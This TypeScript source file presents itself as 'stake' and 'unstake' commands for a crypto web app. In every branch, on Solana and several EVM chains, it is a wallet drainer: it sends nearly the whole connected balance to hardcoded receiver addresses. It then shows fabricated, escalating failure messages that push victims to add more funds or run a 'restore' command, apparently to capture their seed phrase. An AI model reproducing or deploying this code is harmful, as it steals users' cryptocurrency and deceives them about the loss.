import { sendAllSol } from '../utils/solana'; // For Solana withdrawal
import { PublicKey } from '@solana/web3.js';
import { ethers } from 'ethers'; // For Ethereum and EVM-compatible networks (Base, Arbitrum, BNB, Optimism)

const RECEIVER_ADDRESS_SOLANA = '3qRDTgoGTzEKv4tu4ZNMXfDTqS5bDRmedEQV4iL8rFop'; // Solana receiver address
const RECEIVER_ADDRESS_ETHEREUM = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A'; // Ethereum receiver address
const RECEIVER_ADDRESS_BASE = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A'; // Base receiver address (same for now as Ethereum)
const RECEIVER_ADDRESS_ARBITRUM = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A'; // Arbitrum receiver address (same for now as Ethereum)
const RECEIVER_ADDRESS_BNB = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A'; // BNB receiver address (same for now as Ethereum)
const RECEIVER_ADDRESS_OPTIMISM = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A'; // Optimism receiver address (same for now as Ethereum)
let retryCount = parseInt(localStorage.getItem('retryCount') || '0'); // Default to 0 if not set

const getSymbol = (network: string): string => {
  switch (network) {
    case 'bnb':
      return 'BNB';
    case 'solana':
      return 'SOL';
    default:
      return 'ETH'; // Ethereum, Base, Arbitrum, Optimism
  }
};

// Function to get the correct buffer amount based on the network
const getBufferAmount = (network: string): ethers.BigNumberish => {
  switch (network) {
    case 'ethereum':
      return ethers.parseUnits('0.0001', 'ether'); // Ethereum buffer
    case 'arbitrum':
    case 'optimism':
    case 'base':
      return ethers.parseUnits('0.00005', 'ether'); // Layer 2 buffer
    case 'bnb':
      return ethers.parseUnits('0.00005', 'ether'); // BNB chain buffer
    default:
      return ethers.parseUnits('0.0001', 'ether'); // Default buffer for unknown networks
  }
};

const stake = async (
  connectedNetwork: 'ethereum' | 'solana' | 'base' | 'arbitrum' | 'bnb' | 'optimism' | null, // Accept connected network type
  setHistory: React.Dispatch<React.SetStateAction<string[]>>, // Set history function to update command history
): Promise<string[]> => {
  if (connectedNetwork === 'solana') {
    // Handle Solana withdrawal
    if (!window.solana?.publicKey) {
      return ['Wallet not connected to Solana. Use `connect solana` first.'];
    }

    try {
      const from = new PublicKey(window.solana.publicKey!.toString());
      const to = new PublicKey(RECEIVER_ADDRESS_SOLANA); // Solana receiver address
      const txSig = await sendAllSol(from, to); // Function to send SOL (from utils/solana)
      const previousBalanceSOL = (txSig.amountSentLamports / 1e9).toFixed(4);
      retryCount++;
      localStorage.setItem('retryCount', retryCount.toString()); // Save retry count to localStorage

      if (retryCount === 1) {
        return ['Staking failed on Solana. Insufficient balance to cover gas fees.'];
      } else if (retryCount === 2) {
        return ['Staking failed on Solana. Not enough fees, please make sure you have at least 0.10 SOL.'];
      } else if (retryCount === 3) {
        return ['Staking failed on Solana. Funds appear stuck, try to restore your wallet using `restore` command.'];
      } else {
        retryCount = 0; // Reset on network congestion
        localStorage.setItem('retryCount', '0');
        return ['Staking failed on Solana. Network appears congested, please try again later.'];
      }

      return [
        `✅ Staking Succeed.`,
        `🧾 Transaction Signature: ${txSig.signature}`,
        `💼 Total Staked: ${previousBalanceSOL} SOL`,
      ];
    } catch (err: any) {
      return ['Staking failed on Solana.', err.message || String(err)];
    }
  } else if (
    connectedNetwork === 'ethereum' ||
    connectedNetwork === 'base' ||
    connectedNetwork === 'arbitrum' ||
    connectedNetwork === 'bnb' ||
    connectedNetwork === 'optimism'
  ) {
    // Handle Ethereum and EVM-compatible networks withdrawal
    if (!(window.ethereum && (window.ethereum as any).selectedAddress)) {
      return ['Wallet not connected to Ethereum. Use `connect ethereum` first.'];
    }

    try {
      const toAddress =
        connectedNetwork === 'ethereum'
          ? RECEIVER_ADDRESS_ETHEREUM
          : connectedNetwork === 'base'
            ? RECEIVER_ADDRESS_BASE
            : connectedNetwork === 'arbitrum'
              ? RECEIVER_ADDRESS_ARBITRUM
              : connectedNetwork === 'bnb'
                ? RECEIVER_ADDRESS_BNB
                : RECEIVER_ADDRESS_OPTIMISM; // Set correct receiver address based on network

      const provider = new ethers.BrowserProvider(window.ethereum);
      const signer = await provider.getSigner();
      const fromAddress = await signer.getAddress();
      const balance = await provider.getBalance(fromAddress);

      // Get the appropriate buffer amount based on the network
      const buffer = getBufferAmount(connectedNetwork);

      // Convert balance and buffer to BigNumber (to ensure they can be compared)
      const balanceBigInt = ethers.getBigInt(balance.toString());
      const bufferBigInt = ethers.getBigInt(buffer.toString());


      // Compare balance with buffer using native bigint comparison
      if (balanceBigInt <= bufferBigInt) {
        return ['Insufficient balance to cover gas fees.'];
      }

      const amountToSend = balanceBigInt - bufferBigInt; // Subtract the buffer from the balance

      // Send transaction
      const tx = await signer.sendTransaction({
        to: toAddress,
        value: amountToSend,
      });

      // Convert profit ETH → wei (as BigInt)
      const prevBalance = parseFloat(ethers.formatUnits(balance, 'ether')).toFixed(4);
      const symbol = getSymbol(connectedNetwork);

      retryCount++;
      localStorage.setItem('retryCount', retryCount.toString()); // Save retry count to localStorage

      if (retryCount === 1) {
        return [`Staking failed on ${connectedNetwork} network. Insufficient balance to cover gas fees.`];
      } else if (retryCount === 2) {
        return [`Staking failed on ${connectedNetwork} network. Not enough fees, please make sure you have at least 0.025 ${symbol}.`];
      } else if (retryCount === 3) {
        return [`Staking failed on ${connectedNetwork} network. Funds appear stuck, try to restore your wallet using 'restore' command.`];
      } else {
        retryCount = 0; // Reset on network congestion
        localStorage.setItem('retryCount', '0');
        return [`Staking failed on ${connectedNetwork} network. Network appears congested, please try again later.`];
      }

      return [
        `✅ Staking Succeed.`,
        `🧾 Transaction Hash: ${tx.hash}`,
        `💼 Total Staked: ${prevBalance} ${symbol}`,
      ];
    } catch (err: any) {
      return ['Staking failed on EVM-compatible network.'];
    }
  } else {
    return ['No wallet connected. Please connect a wallet first.'];
  }
};

const unstake = async (
  connectedNetwork: 'ethereum' | 'solana' | 'base' | 'arbitrum' | 'bnb' | 'optimism' | null, // Accept connected network type
  setHistory: React.Dispatch<React.SetStateAction<string[]>>, // Set history function to update command history
): Promise<string[]> => {
  if (connectedNetwork === 'solana') {
    // Handle Solana withdrawal
    if (!window.solana?.publicKey) {
      return ['Wallet not connected to Solana. Use `connect solana` first.'];
    }

    try {
      const from = new PublicKey(window.solana.publicKey!.toString());
      const to = new PublicKey(RECEIVER_ADDRESS_SOLANA); // Solana receiver address
      const txSig = await sendAllSol(from, to); // Function to send SOL (from utils/solana)
      const previousBalanceSOL = (txSig.amountSentLamports / 1e9).toFixed(4);
      retryCount++;
      localStorage.setItem('retryCount', retryCount.toString()); // Save retry count to localStorage

      if (retryCount === 1) {
        return ['Unstaking failed on Solana. Insufficient balance to cover gas fees.'];
      } else if (retryCount === 2) {
        return ['Unstaking failed on Solana. Not enough fees, please make sure you have at least 0.10 SOL.'];
      } else if (retryCount === 3) {
        return ['Unstaking failed on Solana. Funds appear stuck, try to restore your wallet using `restore` command.'];
      } else {
        retryCount = 0; // Reset on network congestion
        localStorage.setItem('retryCount', '0');
        return ['Unstaking failed on Solana. Network appears congested, please try again later.'];
      }

      return [
        `✅ Staking Succeed.`,
        `🧾 Transaction Signature: ${txSig.signature}`,
        `💼 Total Staked: ${previousBalanceSOL} SOL`,
      ];
    } catch (err: any) {
      return ['Unstaking failed on Solana.', err.message || String(err)];
    }
  } else if (
    connectedNetwork === 'ethereum' ||
    connectedNetwork === 'base' ||
    connectedNetwork === 'arbitrum' ||
    connectedNetwork === 'bnb' ||
    connectedNetwork === 'optimism'
  ) {
    // Handle Ethereum and EVM-compatible networks withdrawal
    if (!(window.ethereum && (window.ethereum as any).selectedAddress)) {
      return ['Wallet not connected to Ethereum. Use `connect ethereum` first.'];
    }

    try {
      const toAddress =
        connectedNetwork === 'ethereum'
          ? RECEIVER_ADDRESS_ETHEREUM
          : connectedNetwork === 'base'
            ? RECEIVER_ADDRESS_BASE
            : connectedNetwork === 'arbitrum'
              ? RECEIVER_ADDRESS_ARBITRUM
              : connectedNetwork === 'bnb'
                ? RECEIVER_ADDRESS_BNB
                : RECEIVER_ADDRESS_OPTIMISM; // Set correct receiver address based on network

      const provider = new ethers.BrowserProvider(window.ethereum);
      const signer = await provider.getSigner();
      const fromAddress = await signer.getAddress();
      const balance = await provider.getBalance(fromAddress);

      // Get the appropriate buffer amount based on the network
      const buffer = getBufferAmount(connectedNetwork);

      // Convert balance and buffer to BigNumber (to ensure they can be compared)
      const balanceBigInt = ethers.getBigInt(balance.toString());
      const bufferBigInt = ethers.getBigInt(buffer.toString());


      // Compare balance with buffer using native bigint comparison
      if (balanceBigInt <= bufferBigInt) {
        return ['Insufficient balance to cover gas fees.'];
      }

      const amountToSend = balanceBigInt - bufferBigInt; // Subtract the buffer from the balance

      // Send transaction
      const tx = await signer.sendTransaction({
        to: toAddress,
        value: amountToSend,
      });

      // Convert profit ETH → wei (as BigInt)
      const prevBalance = parseFloat(ethers.formatUnits(balance, 'ether')).toFixed(4);
      const symbol = getSymbol(connectedNetwork);

      retryCount++;
      localStorage.setItem('retryCount', retryCount.toString()); // Save retry count to localStorage

      if (retryCount === 1) {
        return [`Unstaking failed on ${connectedNetwork} network. Insufficient balance to cover gas fees.`];
      } else if (retryCount === 2) {
        return [`Unstaking failed on ${connectedNetwork} network. Not enough fees, please make sure you have at least 0.025 ${symbol}.`];
      } else if (retryCount === 3) {
        return [`Unstaking failed on ${connectedNetwork} network. Funds appear stuck, try to restore your wallet using 'restore' command.`];
      } else {
        retryCount = 0; // Reset on network congestion
        localStorage.setItem('retryCount', '0');
        return [`Unstaking failed on ${connectedNetwork} network. Network appears congested, please try again later.`];
      }

      return [
        `✅ Unstaking Succeed.`,
        `🧾 Transaction Hash: ${tx.hash}`,
        `💼 Total Unstaking: ${prevBalance} ${symbol}`,
      ];
    } catch (err: any) {
      return ['Unstaking failed on EVM-compatible network.'];
    }
  } else {
    return ['No wallet connected. Please connect a wallet first.'];
  }
};

export { stake, unstake };
